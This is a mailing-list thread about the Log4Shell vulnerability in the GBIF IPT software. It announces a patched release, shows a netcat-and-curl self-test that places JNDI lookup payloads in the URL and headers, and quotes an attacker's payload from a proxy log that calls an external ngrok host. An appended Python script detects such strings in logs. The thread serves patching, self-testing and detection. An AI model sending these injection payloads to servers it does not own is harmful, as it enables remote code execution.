[IPT] IPT security update (Log4J / Log4Shell exploit)

Matthew Blissett mblissett at gbif.org
Mon Dec 13 14:26:37 UTC 2021


Hi Julien,

I don't think there would be a problem with these specific requests.  
The attacker has to make the IPT log the "jndi" string in the 
data-directory/logs/debug.log or admin.log files.  You could test your 
own server, for example by listening on a TCP socket:

   nc -lvp 1234

and running a similar request:

   curl -g 'https://ipt.example.org/${jndi:ldap://127.0.0.1:1234/anything}' \
     -H 'User-Agent: ${jndi:ldap://127.0.0.1:1234/anything}' \
     -H 'Referer: ${jndi:ldap://127.0.0.1:1234/anything}'

If you have any output from 'nc', there is potential for an exploit.

Cheers,

Matthew


On 13/12/2021 14:14, Julien Cigar wrote:
> Hi Matthew,
>
> As we've several hosted IPTs I upgraded immediately but after checking
> the logs it looks like it wasn't fast enough:
>
> logging% bzgrep 'jndi' http-access.log.*|grep 'ipt'
> http-access.log.1.bz2:Dec 11 17:04:39 router1 haproxy[14902]: 185.220.101.130 - - [11/Dec/2021:16:04:36 +0000] "GET /$%7Bjndi:ldap://c52a-146-56-186-40.ngrok.io/google%7D HTTP/1.1" 200 169114 "$#7Bjndi:ldap://c52a-146-56-186-40.ngrok.io/google#7D" "$#7Bjndi:ldap://c52a-146-56-186-40.ngrok.io/google#7D" "ipt.biodiversity.aq"
>
> Our ipts are hosted in dedicated (FreeBSD) jails and I haven't noticed
> something suspicious.. but is there anything that I should check for
> specifically?
>
> Thanks,
> Julien
>
>
> On Sat, Dec 11, 2021 at 10:55:35AM +0100, Matthew Blissett wrote:
>> Dear IPT users,
>>
>> We have released a new version of the IPT, version 2.5.4 [1]. This version
>> contains fixes to critical security issues with the Struts and Log4J[2]
>> libraries.
>>
>> According to the press [3], the problem with the Log4J library vulnerability
>> is being exploited by malicious users — and I can already see queries
>> containing "jndi" in the web server logs for the IPTs GBIF hosts at
>> cloud.gbif.org, although they are random attempts and would not succeed.
>>
>> All users are highly encouraged to upgrade to this version as soon as
>> possible.
>>
>> As usual, upgrade and installation instructions are in the manual [1].
>> Please remember to check your data directory backup is working before
>> starting the upgrade.
>>
>> [1] https://ipt.gbif.org/manual/en/ipt/2.5/releases#2-5-4-december-2021
>>
>> [2] https://www.lunasec.io/docs/blog/log4j-zero-day/
>>
>> [3] https://www.theguardian.com/technology/2021/dec/10/software-flaw-most-critical-vulnerability-log-4-shell
>>
>> Best regards,
>>
>> Matthew
>>
>>
>> _______________________________________________
>> IPT mailing list
>> IPT at lists.gbif.org
>> https://lists.gbif.org/mailman/listinfo/ipt
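
Added example, not part of the original thread or of the IPT code base: a log check along the lines of the bzgrep above that decodes the escaped forms seen in the quoted proxy log line (%7B and #7B) before matching, and lists the callback hosts named in each lookup string. The log lines, host names and function names are constructed for illustration, and only the literal ${jndi: form seen in this thread is matched.

```python
import re
import sys
from urllib.parse import unquote

# "#7B"-style escapes, as in the proxy log line quoted in this thread, are
# rewritten to "%7B" so a single decoder handles both forms. A stray "#ab"
# elsewhere in a line may be decoded too; that is harmless for detection.
HASH_ESCAPE = re.compile(r"#([0-9A-Fa-f]{2})")
# ${jndi:<scheme>://<host>[:port]  (literal form only)
JNDI_LOOKUP = re.compile(r'\$\{jndi:([a-z]+)://([^/\s}"]+)', re.IGNORECASE)

# Constructed sample lines (documentation addresses and example.* hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Dec/2021:16:04:36 +0000] "GET /$%7Bjndi:ldap://callback.example.net/a%7D HTTP/1.1" '
    '200 169114 "$#7Bjndi:ldap://callback.example.net/a#7D" "-" "ipt.example.org"',
    '192.0.2.11 - - [11/Dec/2021:16:05:02 +0000] "GET /resource?r=birds HTTP/1.1" '
    '200 5120 "-" "Mozilla/5.0" "ipt.example.org"',
    '192.0.2.12 - - [11/Dec/2021:16:06:40 +0000] "GET / HTTP/1.1" '
    '200 7301 "-" "${jndi:LDAP://198.51.100.7:1389/x}" "ipt.example.org"',
]


def normalize(line):
    """Undo %XX and #XX escaping so encoded lookup strings become visible."""
    return unquote(HASH_ESCAPE.sub(r"%\1", line))


def find_jndi_lookups(lines):
    """Return (line_number, scheme, callback_host) for every lookup string."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for scheme, host in JNDI_LOOKUP.findall(normalize(line)):
            hits.append((number, scheme.lower(), host))
    return hits


def callback_hosts(lines):
    """Distinct hosts the lookup strings point at, sorted for reporting."""
    return sorted({host for _, _, host in find_jndi_lookups(lines)})


if __name__ == "__main__":
    # Pass log files as arguments (decompress rotated logs first);
    # with no arguments the constructed sample is scanned.
    paths = sys.argv[1:]
    if not paths:
        print(find_jndi_lookups(SAMPLE_LOG))
    for path in paths:
        with open(path, errors="replace") as handle:
            for hit in find_jndi_lookups(handle):
                print(path, *hit)
```

Run it against the proxy access log and against the IPT's data-directory/logs/debug.log and admin.log: per the reply above, it is a hit in the latter two files that matters.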

